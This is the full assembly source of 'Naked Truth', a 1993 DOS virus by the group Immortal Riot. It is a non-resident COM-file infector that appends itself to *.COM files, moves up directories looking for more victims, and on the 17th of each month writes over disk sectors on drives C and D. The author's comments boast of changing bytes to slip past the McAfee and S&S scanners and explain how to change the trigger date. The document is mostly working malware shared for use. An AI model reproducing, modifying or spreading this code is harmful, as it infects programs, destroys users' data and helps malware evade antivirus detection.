; VirusName : Naked Truth
; Country   : Sweden
; Author    : The Unforiven / Immortal Riot
; Date	    : 17/09/1993
;
; This is a mutation of the virus Born on the Fourth of	July
; This was written by TBSI. Mcafee scan used to find it as the 
; "ash" virus. But I changed on a few bytes, and he's now tricked.
; Dr Alan Salomon "string" where placed at the beginning
; of the code, but now he's cheated too..So...enjoy!
;
; This is a non-overwriting com infector, it is not resident.
; It checks which day it is, and if it is the 17:ten the 
; virus will have a redeeming. A redeeming is very nice.
;
; This might not be the best mutation, but afterall, it
; cheats the most common virus scanners. This was born
; the seventeen of September 1993 (hate all date-names)
;
; Scan v108 can't find this, neither can S&S Toolkit 6.54,
; havn't tried with TBScan/F-Prot, but they will probably
; identify it as the "ash" virus.
;
; Regards : The Unforgiven / Immortal Riot


code segment word public 'code'			; 
assume cs:code,ds:code				; I assume that too :)   
org	100h					; 

main proc;edure					; Old pascal coder ?         


TITLE	Naked Truth				;Mutation Name...   
TOF:						;Top-Of-File
   		jmp	short begin		;Skip over program
  	       	NOP	                        ;Reserve 3rd byte
EOFMARK:	db	26			;Disable DOS's TYPE
		DB	0     ; <- S&S Toolkit "String-Cheater".

first_four:	nop				;First run copy only!
address:	int	20h			;First run copy only!
check:		nop				;First run copy only!
begin:	       	call	nextline		;Push BP onto stack
nextline:	pop	bp			;BP=location of Skip
		sub	bp,offset nextline	;BP=offset from 1st run

		mov	byte ptr [bp+offset infected],0
					    ;Reset infection count

		lea	si,[bp+offset first_four] ;Original first 4 bytes
	        mov	di,offset tof		  ;TOF never changes
	        mov	cx,4			  ;Lets copy 4 bytes
		cld				  ;Read left-to-right
		rep	movsb			  ;Copy the 4 bytes

		mov	ah,1Ah			  ;Set DTA address ...
		lea	dx,[bp+offset DTA]	  ; ... to *our* DTA
		int	21h			  ;Call DOS to set DTA

		mov	ah,4Eh			  ;Find First ASCIIZ
	    	lea	dx,[bp+offset immortal]	  ;DS:DX -} '*.COM',0
		lea	si,[bp+offset filename]	  ;Point to file
		push	dx			  ;Save DX
		jmp	short continue		  ;Continue...

return:
		mov	ah,1ah			  ;Set DTA address ...
		mov	dx,80h			  ; ... to default DTA
		int	21h			  ;Call DOS to set DTA
		xor	ax,ax			  ;AX= 0
		mov	bx,ax			  ;BX= 0
		mov	cx,ax			  ;CX= 0
		mov	dx,ax			  ;DX= 0
		mov	si,ax			  ;SI= 0
		mov	di,ax			  ;DI= 0
		mov	sp,0FFFEh		  ;SP= 0
		mov	bp,100h			  ;BP= 100h (RETurn addr)
		push	bp			  ; Put on stack
		mov	bp,ax			  ;BP= 0
		ret				  ;JMP to 100h

nextfile:	or	bx,bx			;Did we open the file?
		jz	skipclose		;No, so don't close it
		mov	ah,3Eh			;Close file
		int	21h			;Call DOS to close it
		xor	bx,bx			;Set BX back to 0
skipclose:	mov	ah,4Fh			;Find Next ASCIIZ

continue:	pop	dx			;Restore DX
		push	dx			;Re-save DX
		xor	cx,cx			;CX= 0
		xor	bx,bx
		int	21h			;Find First/Next
		jnc	skipjmp		
		jmp	NoneLeft		;Out of files

skipjmp:	mov	ax,3D02h		;open file
		mov	dx,si			;point to filespec
		int	21h			;Call DOS to open file
		jc	nextfile		;Next file if error

		mov	bx,ax			;get the handle
		mov	ah,3Fh			;Read from file
		mov	cx,4			;Read 4 bytes
		lea	dx,[bp+offset first_four]  ;Read in the first 4
		int	21h			   ;Call DOS to read

		cmp	byte ptr [bp+offset check],26	;Already infected?
		je	nextfile			;Yep, try again
		cmp	byte ptr [bp+offset first_four],77  ;
		je	nextfile			    ;

		mov	ax,4202h		;LSeek to EOF
		xor	cx,cx			;CX= 0
		xor	dx,dx			;DX= 0
		int	21h			;Call DOS to LSeek

		cmp	ax,0FD00h		;Longer than 63K?
		ja	nextfile		;Yep, try again...
		mov	[bp+offset addr],ax	;Save call location

		mov	ah,40h			  ;Write to file
		mov	cx,4			  ;Write 4 bytes
		lea	dx,[bp+offset first_four] ;Point to buffer
		int	21h			  ;Save the first 4 bytes

		mov	ah,40h			    ;Write to file
		mov	cx,offset eof-offset begin  ;Length of target code
		lea	dx,[bp+offset begin]	    ;Point to virus start
		int	21h			    ;Append the virus

	  	mov	ax,4200h			;LSeek to TOF
		xor	cx,cx				;CX= 0
		xor	dx,dx				;DX= 0
		int	21h				;Call DOS to LSeek

		mov	ax,[bp+offset addr]		;Retrieve location
		inc	ax				;Adjust location

		mov	[bp+offset address],ax		;address to call
		mov	byte ptr [bp+offset first_four],0E9h  ;JMP rel16 
		mov	byte ptr [bp+offset check],26	;EOFMARK

		mov	ah,40h				;Write to file
		mov	cx,4				;Write 4 bytes
		lea	dx,[bp+offset first_four]	;4 bytes are at DX
		int	21h				;Write to file

		inc	byte ptr [bp+offset infected]	;increment counter
		jmp	nextfile			;Any more?

NoneLeft:	cmp	byte ptr [bp+offset infected],2	;2 infected
		jae	TheEnd				;Party over!
		mov	di,100h				;DI= 100h
		cmp	word ptr [di],20CDh		;an INT 20h?
		je	daycheck			;je daycheck      
; ��-���-��������--����--������-�����--�������-������----������-�����-����-
; Here instead of "JE" to theend here, jump to Daycheck, and if the day
; isn't the 17:ten, just continue to theend, but if it is, have phun...
; ��-���-��������--����--������-�����--�������-������----������-�����-����-
	        lea	dx,[bp+offset riot]	;dot-dot method..
;	        MOV	DX,OFFSET RIOT		;shitty liner..      
		mov	ah,3Bh			;Set current directory
		int	21h			;CHDIR ..
		jc	TheEnd			;We're through!
		mov	ah,4Eh			;check for first com
		jmp	continue		;Start over in new dir
; ��-���-��������--����--������-�����--�������-������----������-�����-����-
; If you want to get a redeeming on some special month, just look at the
; call to daycheck at "nonleft" and the call to daycheck. Change the call
; to monthcheck, and "delete" the ";" on procedure monthcheck. But 
; remember, that makes, the virus much less destructive, and by that time,
; all scanners has probably added a new scan-string on this one. Now it will
; go off the 17:th every month. Feel free to modify this date as much you
; want to.
; ��-���-���������--���--������-�����--�������-�������-��������-�����-�-��-
; monthcheck:		 ; check what month it is..   
;  	mov ah,2ah	 ;                         
;  	int 21h		 ; dos to your service..
;  	cmp dh,10  	 ; check if month 10..      
;	je  daycheck	 ; if yes jump to day check
; 	jmp theend	 ; otherwise jump to theend.
; ��-���-��������--����--������-�����--�������-������----������-�����-����-
DAYCHECK:		 ; Check what day it is..
  	mov ah,2ah	 ; 
 	int 21h		 ; Dos to your service..
 	cmp dl,17	 ; Check if it's the forbidden night..
 	je  redeeming	 ; If yes, have a great fuck..
 	jmp theend	 ; Otherwise jump to theend

REDEEMING:				; Havi'n such a great fuck..
	cli				; Cleaning all interrupts..>
	mov	ah,2			; Starting with drive C   
	cwd				; Starting it from 0     
	mov	cx,0100h		; Continue to 256
	int	026h			; Direct disk-write
	jmp	KARO 			; Jump For Joy..(J4J).. 

KARO: 					; Yet another..
	CLI				; No law-breakers here!
	MOV	AL,3			; Set to fry drive D
	MOV	CX,700			; Set to write 700 sectors
	MOV	DX,00			; Starting at sector 0
	MOV	DS,[DI+99]		; Put random crap in DS
	MOV	BX,[DI+55]		; More crap in BX
	CALL	REDEEMING		; Start it all over..

TheEnd:		jmp	return          ; Getting a gold medal ?            

Immortal:	db	'*.COM',0    	;File Specification
Riot:   	db	'..',0		;'Dot-Dot'     

MutationName:	db	" Naked Truth! "  
Sizefilling:	db	" Hi-Tech Assasins - Ready To Take On The World "
morefilling:	db	" // DEATH TO ALL - PEACE AT LAST // "
Copyleft:     	db	' The Unforgiven / Immortal Riot '        


; ��-���-��������--����--������-�����--�������-������----������-�����-����-
; None of this information is included in the virus's code.  It is only
; used during the search/infect routines and it is not necessary to pre-
; serve it in between calls to them.
; ��-���-��������--����--������-�����--�������-������----������-�����-����-

EOF:						;End Of File..
DTA:		db	21 dup (?)		;internal search's data

attribute	db	?			;attribute
file_time	db	2 dup (?)		;file's time stamp
file_date	db	2 dup (?)		;file's date stamp
file_size	db	4 dup (?)		;file's size
filename	db	13 dup (?)		;filename

infected	db	?			;infection count

addr		dw	?			;Address

main endp;rocedure
code ends;egment

end main

; Greets goes out to : Raver, Metal Militia, Scavenger
; and all other	hi-tech assasins all over the world...